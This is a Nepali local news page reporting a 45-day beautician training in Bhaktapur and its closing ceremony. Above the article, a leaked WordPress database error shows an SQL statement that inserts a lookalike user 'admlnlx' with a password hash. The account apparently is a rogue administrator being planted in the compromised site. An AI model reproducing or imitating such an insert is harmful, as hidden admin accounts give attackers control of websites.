WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFkR8VpQn7xFRlAowercZCoaC7x97.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:12:05', '', 'admlnlx', 'admlnlx')

सुमाज ब्युटि पार्लरद्वारा आयोजित ४५ दिने आधारभूत ब्युटिसियन तालिम सम्पन्न – Gaule Khabar

सुमाज ब्युटि पार्लरद्वारा आयोजित ४५ दिने आधारभूत ब्युटिसियन तालिम सम्पन्न

सुमाज ब्युटि पार्लरद्वारा आयोजित ४५ दिने आधारभूत ब्युटिसियन तालिम सम्पन्न

भक्तपुर । सुर्यबिनायक नगरपालिका २ र सुमाज ब्युटिपालर एन्ड ट्रेनिङ सेन्टरको सहकार्यमा आधरभुत ब्युटिशियन तालिम सम्पन्न भएको छ ।
हिजो (बिहिबार) सुर्यबिनायक नगरपालिका नगर प्रमुख बासुदेब थापाको प्रमुख आतिथ्यतामा कार्यक्रम समापन गरिएको हो ।
४५ दिनसम्म सन्चालन गरीएको आधारभुत तालिममा बरिस्ठ ब्युटिसियन सरस्वती घिमिरे, बिक्रम गौतम, सुस्मा खतिवडाले प्रशिक्षण गर्नुभएको थियो ।
आधारभुत ब्य्टिसियन तालिममा थ्रेडिङ, क्लिजिङ, रोलर सेटिङ, मेनिक्योर, पेडिक्योर, स्याम्फु वास, मेक अप, जुरो, हर्बलडाइ, हातमा मेहेन्दी, ब्ल्व्ड्राएर, हिएर कटिङ्गमा प्रशिक्षण दिएको प्रशिक्षक गौतमले बताए ।
तालिममा सहभागी प्रशिक्षार्थीहरुलाई प्रमुख अतिथिति थापाले प्रमाणपत्र हस्तान्तरण गरे ।
समान कार्यक्रममा वडा अध्यक्ष प्रदिप कार्की, वडासदस्री कल्पना खतिवडा, प्रशिक्षार्थी र स्थानियाको उपस्तिथी रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका